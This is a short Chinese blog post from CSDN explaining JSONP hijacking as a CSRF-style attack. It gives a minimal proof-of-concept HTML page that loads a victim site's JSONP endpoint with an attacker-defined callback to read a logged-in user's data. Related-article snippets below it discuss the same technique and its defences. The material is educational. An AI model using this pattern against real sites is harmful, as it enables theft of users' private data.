csrf攻击中的jsonp

最新推荐文章于 2024-05-08 10:16:25 发布
最新推荐文章于 2024-05-08 10:16:25 发布
阅读量1k 收藏
点赞数
分类专栏: javascript 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/THEANARKH/article/details/52312239
版权

假设我的网站代码为

<!DOCTYPE html>
  <html>
  <head>
    
  </head>
  <body >
  <script type="text/javascript">
    function fun(x){
      alert(x)
    }
  </script>
   <script type="text/javascript" src='http://www.normal.com/jsonp.php?callback=fun'></script>
    </body>
  </html>


如果www.normal.com是通过jsonp的方式获取数据的,那么用户在登录www.normal.com的时候,如果访问了我的网站,那么我就能获取该用户的信息。

theanarkh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7613
​介绍 JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
jsonp
01-08
同源策略是Netscape公司在设计JavaScript时引入的一项安全机制,其目的是防止恶意脚本通过XSS(跨站脚本攻击)或CSRF(跨站请求伪造)等手段获取、修改用户敏感信息。然而,这同时也限制了合法的跨域数据请求,比如...
前端知识点-jsonp csrf
weixin_34104341的博客
02-19 101
jsonp详解ajax的核心是通过XmlHttpRequest获取非本页内容jsonp的核心则是动态添加<script>标签来调用服务器提供的js脚本。利用script标签绕过同源策略,获得一个类似这样的数据,jsonpcallback是页面存在的回调方法,参数就是想得到的json。参考文章:http://www.cnblogs.com/yuzhongwusan/...
CSRF攻击原理介绍和利用-腾讯云开发者社区
最新发布
程序员阿飘 的博客
05-08 753
CSRF是什么?答:CSRF()跨站请求伪造,也被称为或者,是一种广泛存在于网站的安全漏洞缩写为CSRF/XSRF。CSRF则通过伪装来自受信任用户的请求来利用受信任的网站,与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性,但往往同XSS一同作案!如何理解你可以这么理解CSRF攻击?“攻击者盗用了你的身份,以你的名义发送恶意请求”,CSRF是一种依赖web浏览器的、被混淆过的代理人攻击,往往涉及到个人隐私泄露以及财产安全。
jsonp劫持攻击
focus on security
05-27 700
JSONP 全称是 JSON with Padding,是一个非官方的协议json的一种使用模式,可以让网页从别的网站那获取资料,利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的JavaScript脚本同时带一个callback函数名作为参数。 服务端收到请求后,动态生成脚本产生数据,并在代码以产生的数据为参数调用callback函数,网页可以得到从其他来源动态产生的json数据,因此可以用来实现跨域。 如果网站B对网站A的JSONP请求没...
Jsonp劫持攻击理解
yuanfengfengyuan的博客
06-29 615
Jsonp的劫持 Ajax、Jsonp和Json的区别 Ajax:web端通过GET或POST等HTTP协议请求从外部获取数据并进行数据的处理,默认不能跨域(域名端口相同原则),但可以通过代理跨域; $.ajax({ url:‘请求地址’, type: ‘请求方式: 默认是’GET’,常用的还有’POST’ ', dataType: ‘设置返回的数据格式,常用的是’json’格式,也可以设置为’html’ ‘, data: ‘设置发送给服务器的数据’, success: ‘设置请求成功后的回调函数’,
详解JSON和JSONP劫持以及解决方法
01-19
json劫持 json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是...攻击者可以在自己的虚假页面,加入如下标签: <script src=http://www.test.co
spring security CSRF防护的示例代码
08-26
Spring Security 4.0 及更高版本默认启用 CSRF 防护,以防止 CSRF 攻击应用程序。下面是 Spring Security CSRF 防护机制的详细解释。 CSRF 攻击 CSRF 攻击是一种迫使用户在当前已登录的 Web 应用程序上执行非本意...
Web高级知识-跨域&XSS;&CSRF;解决方案
11-26
CSRF(Cross-site request forgery)攻击CSRF攻击利用用户已登录的身份,通过诱导用户点击含有恶意请求的链接或表单,执行非用户意愿的操作。防范CSRF通常需要使用CSRF Token,这是一个随机生成的、一次性的令牌...
详解JSON和JSONP劫持以及解决方法.docx
01-22
JSON劫持和JSONP劫持属于CSRF攻击范畴,因此解决的方法和解决CSRF攻击的方法一样。有两种解决方法: 1. 验证HTTP Referer头信息:在服务器端验证 Referer 头信息,以确保请求来自合法的来源。 2. 在请求添加CSRF ...
php csrf jsonp,JSONP绕过CSRF防护token
weixin_33601504的博客
03-25 264
第一次遇到了jsonp劫持漏洞,并且通过此漏洞绕过token进行成功的csrf攻击JSONP什么是jsonpJsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。JSONP的语法和JSON很像,简单来说就是在JSON外部用一个函数包裹着。JSONP基本语法如下:callback({ "name": "kwan"...
JSONP劫持
March
07-11 2405
简介 浏览器使用同源策略(SOP)对网站安全进行防护,但一定程度限制了前端功能实现,所以就有了很多跨域手段,所有带src或href属性的标签可以跨域。 比如 < script src = "..." > </script> <img src="..."> <video src="..."></video > <audio src ...
php csrf jsonp,详解JSON和JSONP劫持检测代码以及解决方法
weixin_30635707的博客
03-25 160
json劫持json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。比如下面的链接在已登录的情况下会返回json格式...
php csrf jsonp,详解JSON和JSONP劫持以及解决方法
weixin_36062835的博客
03-25 219
json劫持json劫持攻击又为”JSON Hijacking”,攻击过程有点类似于csrf,只不过csrf只管发送http请求,但是json-hijack的目的是获取敏感数据。一些web应用会把一些敏感数据以json的形式返回到前端,如果仅仅通过cookie来判断请求是否合法,那么就可以利用类似csrf的手段,向目标服务器发送请求,以获得敏感数据。比如下面的链接在已登录的情况下会返回json格式...
浅谈CSRF跨域读取型漏洞之JSONP劫持
记录学习,一起进步
03-06 831
CSRF跨域读取型漏洞之JSONP劫持
JSONP跨域访问漏洞
Echo__h的博客
05-02 453
构造如下页面,创建恶意链接诱使用户点击,即可获取用户的信息// 调用stringfy方法,将JSON对象转换为字符串 alert(JSON . stringify(args));//"></script> // %2B为+ %26为& < / script >模拟用户访问,成功将cookie和url地址添加到数据库。
分享一个jsonp劫持造成的新浪某社区CSRF蠕虫
Coisini的博客
06-15 439
最近jsonp很火,实话说已经是被玩烂了的,只是一直没有受到大家的重视。正好在上个月,我挖过一个由于jsonp造成的新浪某社区CSRF,当时是为了准备一篇文章,之后这篇文章也会拿出来分享。 因为新浪已经修复了问题,所以我先把这个漏洞分享出来。以下是当时写的部分文章。 0x01 引子 听说新浪五月送衣服,我其实也没太多空去挖洞。本来想交一个两年前挖的CSRF刷粉,结果拿出来一看那洞早没了,目标站都...
json csrf html5,谈谈Json格式下的CSRF攻击
weixin_42449311的博客
06-28 450
原标题:谈谈Json格式下的CSRF攻击一、CSRF漏洞简介csrf漏洞的成因就是网站的cookie在浏览器不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)。这个操作不是用户真正想要执行的。在post标准化格式(accounts=t...
csrfjsonp利用
07-27
当一个网站使用JSONP来获取数据时,它会在请求包含一个callback函数名作为参数。攻击者可以构造一个恶意网页,在其通过script标签发起一个JSONP请求,将callback函数指向自己的恶意代码。当用户访问这个恶意网页...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值